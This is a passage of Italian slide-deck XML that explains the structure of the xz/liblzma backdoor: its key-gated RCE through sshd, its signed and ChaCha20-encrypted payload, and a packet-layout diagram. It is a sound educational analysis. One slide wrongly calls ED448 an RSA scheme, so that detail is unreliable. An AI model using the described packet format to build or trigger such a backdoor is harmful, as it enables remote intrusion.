              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>priv,Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, viene confrontata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>con una chiave pubblica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iniettata durante l'installazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pub,Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt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2620448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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="412420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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analisi dell'autenticazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L'autenticazione "delegata" alla backdoor è il motivo per cui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> era 1,7 volte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>più lento!</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Filippo Valsorda, crittografo open-source, parla di un attacco  RCE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>gated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e non-bypass:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: passata l'autenticazione, il payload del pacchetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>viene eseguito</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>system;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>gated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>solo il proprietario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> del certificato di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub,Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> può eseguire la backdoor;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>non-bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: non c'è un escamotage per "girare attorno" all'autenticazione che, anzi, è parte del piano. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Tan è formalmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>autorizzato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> dal sistema ad entrare nel S.O. in remoto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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6952555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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="4462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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caratteristiche del pacchetto</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> dev'essere un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>chypertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> con Enc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>chacha20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Kpriv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>(M),M):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>M firmato con chiave a crittografia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> RSA con protocollo ED448, un protocollo di tipo ECC;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-250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it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>la conosce solo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Tan;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> è sul sistema;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Firma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kpriv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(M) concatenata a M costituiscono il payload e vengono criptati con chacha20, un counter stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cypher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> con chiave 256-bit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nounce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e counter 64-bit;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A1E60A1D-1B57-50D9-2F6A-8537D53EDD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383412" y="2691114"/>
            <a:ext cx="11237088" cy="116955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1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   a (32 bit)  |   b (32 bit)  |           c (64 bit)          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ciphertext (240 bytes)                    +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+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9671570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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="440120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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verifica del pacchetto</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
